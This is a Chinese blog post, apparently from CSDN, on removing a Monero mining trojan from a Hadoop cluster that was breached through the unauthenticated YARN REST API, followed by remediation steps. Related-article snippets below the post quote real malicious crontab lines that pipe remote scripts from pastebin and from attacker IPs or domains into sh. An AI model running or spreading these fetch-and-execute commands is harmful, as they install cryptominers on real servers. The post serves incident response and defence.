(七)云服务器搭建集群遇到挖矿木马

最新推荐文章于 2021-10-10 16:48:32 发布
最新推荐文章于 2021-10-10 16:48:32 发布
阅读量643 收藏 1
点赞数
分类专栏: 云计算与大数据 文章标签: hadoop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ares_song/article/details/83113491
版权

       前几天尝试用3台云服务器搭建起了一个hadoop集群,其中有两台服务器用来跑自己社团和博客的网站,突然发现打开网页变卡。然后使用top命令,发现有个进程的cpu占用率尽然高达99%,于是将其kill,cpu缓和了不少,但是不久后又出现新的进程,cpu同样飙升到99%,这个问题前天发现,不过通过这几天的查找,找到了问题的所在。

问题出现高占用cpu

 

解决问题:

 

执行ps aux |grep [pid]命令,定位到可疑的挖矿木马文件,位于/var/tmp/目录下

 

      执行hadoop   version命令,检查Hadoop版本,当前Linux服务器上安装的Hadoop版本号为2.6.5(此版本支持认证服务,但若未开启,攻击者则可通过Hadoop Yarn资源管理系统REST API未授权漏洞入侵系统)

cd /etc 执行 crontab -e命令,检查任务计划,yarn用户每分钟向C2地址发起请求,获取最新脚本文件(将其用#注释)

注释掉这行木马代码

 

执行 cat /var/log/cron命令,(查看对应的日志文件)检查任务计划日志,发现挖矿木马在替换过C2地址

 

     通过上述操作,我们定位到了此次事件中的门罗币挖矿木马程序和核心控制脚本,由于涉及到网络安全知识,本人能力尚浅,不足已说明,仅此提供解决方案

详细木马内容请看:https://yq.aliyun.com/articles/590449

注释掉木马文件后,kill高cpu进程,cpu利用率恢复正常且不再出现

后续维护:

1、先收回\tmp目录的执行权限

2、通过安全组关闭yarn的8088端口,防止后续黑客继续入侵

3、对yarn提交任务进行最小权限控制,用户权限控制

4、清理ssh里的可疑文件,和known hosts

Ares_song
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 633
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里服务器存在挖矿行为,请及时整改,不然服务器被收回。
南京大学主机常用命令
钟灵宛清
11-07 542
1.连接主机 ssh root@主机ip 2.从本地向主机传输文件 scp 源路径 root@主机ip:主机路径 如:scp F:/a.txt root@172.19.240.106 3.主机连接校园网 curl "http://p.nju.edu.cn/portal_io/login" --data "username=***&password=***" ...
阿里服务器存在恶意挖矿程序
NicolasLearner的博客
04-27 887
阿里发了很多短信。 进入服务器,发现速度缓慢。 输入 top命令查看cpu利用率,发现被占满。networkservice , sysupdate这两个程序。 netstat -anop 也能查询到很多 networkservice的程序用tcp在运行, 首先kill掉上述进程,但是没有卵用,还是很卡,top命令发现这些程序又启动了。 可以在 /proc/[PID]/目录下查看 exe文件,找到 进程对应的启动文件。 但是删掉这些文件还没有用,文件又被创建。 经上网查询.
服务器挖矿病毒查杀日记
忆年--尘封的记忆
04-28 867
接手的某项目部署于某平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧。但凡事总有个但是,近期发现服务器CPU资源占用稳定在50%以上,且系统盘各目录被持续定入core.1234之类的陌生文件,导致磁盘空间占用超高。 紧接着操作服务器,不管执行什么命令,都会有这个错误提示: ERROR: ld.so: object '/usr/local/lib/libs.so' f.
服务器 被挖矿 未解决
qq_40567146的博客
09-04 797
连接阿里服务器发现很卡,top 显示不出高占用进程,cpu100%占用。 crontab -l  发现有定时任务: */30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 地址打开找不到源码,根据网上资料操作:vim  /etc/ld.so.preload   删除其中内容 后执行ldconfig 再使...
在阿里服务器上利用 Docker 搭建 Hadoop 集群
01-07
Docker 安装与配置 安装 Docker(摘自 Docker 官方文档) 设置 Docker Repository 更新软件索引$ sudo apt-get update 安装一些必要的包 $ sudo apt-get install \ ... ca-certificates \ curl \ ...
阿里公网redis集群搭建以及java访问redis集群
04-20
阿里公网Redis集群搭建及Java访问教程 在计算日益普及的今天,阿里提供了便捷的公共服务,如Redis缓存服务,帮助企业或个人快速构建高效、可靠的分布式应用。本教程将详细讲解如何在阿里上搭建公网Redis...
服务器集群搭建
11-08
本文将详细讲解如何搭建一个包括Nginx服务器、微信服务器(wx服务器)、Redis服务器以及业务处理服务器的集群环境。 一、Nginx服务器 Nginx是一款高性能的HTTP和反向代理服务器,以其轻量级、高并发处理能力而闻名...
阿里redis集群搭建.docx
07-13
### 阿里Redis集群搭建详解 #### 一、背景与目的 随着业务规模的不断扩大,单一Redis实例已经难以满足高性能、高可用性的需求。为此,越来越多的企业选择搭建Redis集群来提高系统的处理能力和容错能力。然而,在...
基于天翼ECS搭建Oracle+RAC集群指南7+11G
09-24
基于天翼ECS搭建Oracle+RAC集群指南7+11G 本文档旨在指导用户基于天翼ECS搭建Oracle+RAC集群,涵盖了从资源规划到创建资源的整个过程。 资源规划 资源规划是搭建Oracle+RAC集群的关键步骤之一。在本节中,...
服务器挖矿病毒处理之二 --------bin/x7进程开机自启动
一杯咖啡的渗透记忆
11-08 870
服务器挖矿病毒处理之一 --------kworker和netfs异常 上面之一是我遇到的第一个问题,当时以为解决了,但发现其中有三台机器只要启动后就会有bin/x7程序,很是顽固。 重启后就有问题,我查看了所有cron*的文件显示都正常的,然后再看了一下/etc/init.d里面的文件发现里面network文件的日期跟前面中毒的日期一样,打开了一搜发现有代码关于bin/x7而且shi后台执...
记一次CDH集群被下矿机
张老湿的博客
05-04 2966
今天一上线看到集群cpu跑到100%,心里也是一跳,该不会是被下矿机了吧 top一下,果不其然有个占进程占了大部分的cpu PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 23429 yarn 20 0 4121432 985.4m 39116 S 1226.7 1.5 ...
详细 解决阿里服务器CUP爆满被用来当挖矿机问题
qq_43688472的博客
06-17 2688
一:问题与现象 1.阿里服务器短信通知预警 2.xshell 中top命令程序发现cup爆满 二:解决问题 在上面top中显示是hadoop用户下面的进程爆满 所以要在hadoop用户下面操作 ,查看进程如下 解决: 1.crontab -l命定 查看脚本 2.crontab -e 3.用# 把他注释掉 4.因为上面的脚本是wget 我们就用yum remove 把他卸载掉 (卸...
今天,你的服务器被“挖矿”了吗?
weixin_34010566的博客
06-10 448
本文作者:晨光 运维工程师 web服务应用是最为常见的应用之一,主要是通过对公网放行服务器的端口供客户访问来提供服务。这类服务对数据安全、访问控制的要求会比较高。但最为核心的还是后端服务器主机层,当后端主机不能正常工作时,前端展示的web服务一定是收到牵连的,如何维护后端服务器正常运行就显得尤为重要了。 这里提到后端主机的正常运行,就不得不提“***”这个词了,让互联网小白一筹莫展的无形杀手。他...
虚拟矿机服务器架设,服务器搭建矿机
weixin_36376992的博客
08-12 706
服务器搭建矿机 内容精选换一换在专属主机资源上创建服务器失败,可能由以下原因造成:您所选择的服务器规格不在您已有的专属主机支持范围内。各类型专属主机支持的服务器规格请参见概述。各类型专属主机支持的服务器规格请参见概述。您的专属主机资源不足,无法创建您所选择的服务器规格。您可以查看专属主机的剩余vCPU和内存数量是否满足您所选择的服务器规格。如果资源不足,您弹性服务器(Elastic...
区块链太火,小心你的服务器被动挖矿
kwame211的博客
05-30 3204
某日,笔者收到 VPS 服务器 CPU 告警,上服务器一看,有个叫做 gpg-agentd 的进程占用大量的 CPU 资源。接着就是常规的排查,IO 情况、网络流量、内存情况、系统日志、crontab 等。当排查到 crontab 时,发现 crontab 有如下的任务:*/5 * * * * curl -fsSL http://84.73.251.157:81/bar.sh | sh */5 *...
【解决】ECS测试集群遭遇挖矿程序攻击
Moody的博客
09-09 414
[root@hadoop1 sbin]# crontab -l */10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|s...
Hadoop2.6.0集群安装
benladeng5225
01-08 344
环境 本教程使用 Ubuntu 14.04 64位 作为系统环境,基于原生 Hadoop 2,在 Hadoop 2.6.0 (stable) 版本下验证通过,可适合任何 Hadoop 2.x.y 版本,例如 Hadoop 2.7.1,Hadoop 2.4.1 等。 本教程简单的使用两个节点作为集群环境: 一个作为 Master 节点,局域网 IP 为 192.168.1.121;另一个作为...
实验一(1)hadoop安装与配置
qq_41166909的博客
10-10 954
开始 1. 【实验步骤】安装Hadoop# 一、启动Docker容器 1.加载镜像 实验使用的Docker镜像保存在/cg/images/hadoop_node.tar.gz文件中,执行如下命令加载该镜像: docker load < /cg/images/hadoop_node.tar.gz 2.启动实验容器 执行如下四个命令,启动四个名称分别为master、slave1、slave2、slave3的docker容器用于实验: docker run --name...
服务器搭建nacos集群
最新发布
05-22
在各个服务器上启动 Nacos 集群。 ``` sh startup.sh -m standalone ``` 其中 `-m` 参数可以设置为 `standalone`、`cluster` 或 `config`,这里选择 `standalone`。 在所有服务器上启动成功后,即可进入 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值